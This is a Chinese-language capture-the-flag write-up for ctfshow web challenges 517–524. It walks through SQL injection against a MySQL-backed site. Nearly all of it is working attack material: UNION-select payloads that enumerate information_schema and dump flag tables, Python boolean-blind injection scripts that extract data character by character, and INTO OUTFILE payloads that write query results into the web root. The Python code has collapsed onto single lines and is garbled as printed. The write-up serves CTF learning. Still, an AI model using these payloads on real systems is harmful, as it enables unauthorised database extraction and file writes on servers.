web517
注入点id
?id=-1’union select 1,2,3–+
确认是否能够注入
?id=-1'union select 1,database(),3--+
爆出库名
security
爆出表名
?id=-1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+
emails,referers,uagents,users
然后发现这几个表里面没有flag,我们重新倒回去爆库名,肯定是库错了,因为我偷工减料了
?id=-1'union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+
ctfshow,ctftraining,information_schema,mysql,performance_schema,security,test?id=-1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),3--+
flag?id=-1'union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flag'),3--+
id,flag?id=-1' union select 1,id,flag from ctfshow.flag--+
我忘了这个东西就是我爆破出来的是列名,我在那里一直错哈哈被自己蠢死了
由于本身我们处于security库里面所以查询需要用ctfshow.flag
web518
单引号被过滤了好像是
表名变为flagaa
?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name="flagaa"),3--+
id,flagac?id=-1 union select 1,id,flagac from ctfshow.flagaa--+
web519
盲猜是一个md5闭合我没有跑fuzz,正常做法应该是跑个fuzz
所以我是自己慢慢试的
?id=-1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),3--+
flagaanec?id=-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flagaanec'),3--+
id,flagaca?id=-1') union select 1,id,flagaca from ctfshow.flagaanec--+
web520
欧克换成")闭合
?id=-1") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),3--+
flagsf?id=-1") union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flagsf'),3--+
id,flag23?id=-1") union select 1,id,flag23 from ctfshow.flagsf--+
web521
布尔盲注
不会的去我主页学,hhh
import requests
flag=""
i = 0
while True:i = i+1low = 32high =127while low < high:mid = (low+high)//2#url = f"http://bbd62807-74a1-427b-bdb6-13b06ba54c08.challenge.ctf.show/?id=1' and ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid} --+"#url = f"http://bbd62807-74a1-427b-bdb6-13b06ba54c08.challenge.ctf.show/?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{i},1))>{mid} --+"#url = f"http://bbd62807-74a1-427b-bdb6-13b06ba54c08.challenge.ctf.show/?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagpuck'),{i},1))>{mid} --+"url = f"http://d3143244-6fab-4359-b663-ce8a0ad8d9b9.challenge.ctf.show/?id=1' and ascii(substr((select flag33 from ctfshow.flagpuck),{i},1))>{mid} --+"r=requests.get(url=url)if "You are in..........." in r.text:low = mid+1else:high = midif low !=32:flag+=chr(low)else:breakprint(flag)
web522
布尔盲注
import requestsflag=""
i = 0while True:i = i+1low = 32high =127while low < high:mid = (low+high)//2#url = f'https://cfa15b6d-99c6-4585-938d-e0376150cb96.challenge.ctf.show/?id=1" and ascii(substr((select group_concat(schema_name) from information_schema.schemata), {i}, 1)) > {mid} --+'#url = f'https://cfa15b6d-99c6-4585-938d-e0376150cb96.challenge.ctf.show/?id=1" and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"), {i}, 1)) > {mid} --+'#flagpa#url = f'https://cfa15b6d-99c6-4585-938d-e0376150cb96.challenge.ctf.show/?id=1" and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="flagpa"), {i}, 1)) > {mid} --+'url = f'https://cfa15b6d-99c6-4585-938d-e0376150cb96.challenge.ctf.show/?id=1" and ascii(substr((select group_concat(id,flag3a3) from ctfshow.flagpa), {i}, 1)) > {mid} --+'r=requests.get(url=url)if "You are in..........." in r.text:low = mid+1else:high = midif low !=32:flag+=chr(low)else:breakprint(flag)
web523
闭合换了并且不是盲注
?id=1") union select 1,2,3--+
提示使用outfile?id=1") union select 1,(select group_concat(schema_name) from information_schema.schemata),3 into outfile "/var/www/html/2.txt"--+
结果没有
一直注入不上原来我闭合都错了但是居然也有回显
?id=1')) union select 1,2,3 into outfile "/var/www/html/5.txt"--+ 成功
1 2 3
?id=1')) union select 1,(select group_concat(schema_name)from information_schema.schemata),3 into outfile "/var/www/html/7.txt"--+
1 ctfshow,ctftraining,information_schema,mysql,performance_schema,security,test 3?id=1')) union select 1,(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow'),3 into outfile "/var/www/html/8.txt"--+
1 flagdk 3?id=1')) union select 1,(select group_concat(column_name)from information_schema.columns where table_name='flagdk'),3 into outfile "/var/www/html/6.txt"--+
1 id,flag43 3?id=1')) union select 1,(select group_concat(id,flag43)from ctfshow.flagdk),3 into outfile "/var/www/html/4.txt"--+
web524
布尔盲注
import requestsflag=""
i = 0while True:i = i+1low = 32high =127while low < high:mid = (low+high)//2#url = f"https://a63f32c8-fbaa-438b-bdf3-3b0bea1f7e35.challenge.ctf.show/?id=1' and ascii(substr((select group_concat(schema_name) from information_schema.schemata), {i}, 1)) > {mid} --+'"#url = f"https://a63f32c8-fbaa-438b-bdf3-3b0bea1f7e35.challenge.ctf.show/?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'), {i}, 1)) > {mid} --+"#flagjugg# url = f"https://a63f32c8-fbaa-438b-bdf3-3b0bea1f7e35.challenge.ctf.show/?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flagjugg'), {i}, 1)) > {mid} --+"# id, flag423url = f"https://a63f32c8-fbaa-438b-bdf3-3b0bea1f7e35.challenge.ctf.show/?id=1' and ascii(substr((select group_concat(id,flag423) from ctfshow.flagjugg), {i}, 1)) > {mid} --+"r=requests.get(url=url)if "You are in..........." in r.text:low = mid+1else:high = midif low !=32:flag+=chr(low)else:breakprint(flag)
![[XYCTF新生赛2024]-PWN:EZ2.0?(arm架构,arm架构下的系统调用)](https://img-blog.csdnimg.cn/direct/6ff84bdec5474ffd9f46e39f3fe3d8a6.png)
